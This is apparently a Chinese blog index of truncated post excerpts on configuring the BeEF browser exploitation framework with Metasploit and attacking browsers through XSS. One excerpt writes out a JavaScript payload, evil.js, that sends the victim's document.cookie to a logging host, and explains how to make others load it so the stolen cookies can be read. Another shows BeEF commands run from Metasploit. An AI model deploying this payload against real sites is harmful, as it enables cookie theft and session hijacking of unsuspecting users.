摘要:
转自:http://hi.baidu.com/unixshell/item/2b57af1112ec9df9746a8430配置beef和metasploit(包含安装Beef过程)系统环境:BackTrack5R1软件版本:Beef0.4.3.6-alphametasploitv4.4.0-devsvnr15552一、前言之前对于BeEF毫无了解,好奇心驱使下便按部就班研究一下,虽然中途问题多多,但是最后还算成功,收获不少二、安装BeEF按照文章上所指,先删除BT5上面自带的版本稍旧的BeEFrm-rf/pentest/web/beef-ng然后通过Gitclone最新的BeEF代码gitc 阅读全文
摘要:
转自:http://hi.baidu.com/unixshell/item/396c3e9968dbf4cfb625310cBeEF是目前欧美最流行的web框架攻击平台,它的全称 是theBrowserexploitationframeworkproject.最近两年国外各种黑客的会议都有它的介绍,很多 pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过 浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。如何配置beef和metasploitwindo 阅读全文
摘要:
转自:http://www.2cto.com/Article/201207/140515.html作者 Joe Lynch[Dis9]1、引言Beef 一个很强大的xss 攻击框架新版的beef 还不是很熟悉2、测试开始msf > beef_connect http://192.168.2.106:3000 beef beef[*] Connected to http://192.168.2.106:3000msf > beef_onlineCurrently hooked browsers within BeEFId IP OS-- -- --0 1.1.1.2 Microsof 阅读全文
摘要:
在evil.js文件中写如下代码,存储在www.test.com根目录下var img=document.createElement("img");img.src="http://www.test.com/log?"+escape(document.cookie);document.body.appendChild(img);然后在测试页,想办法让别人运行这段代码<script src="http://www.test.com/evil.js"></script>然后在web日志中可查看窃取的cookie信息如 阅读全文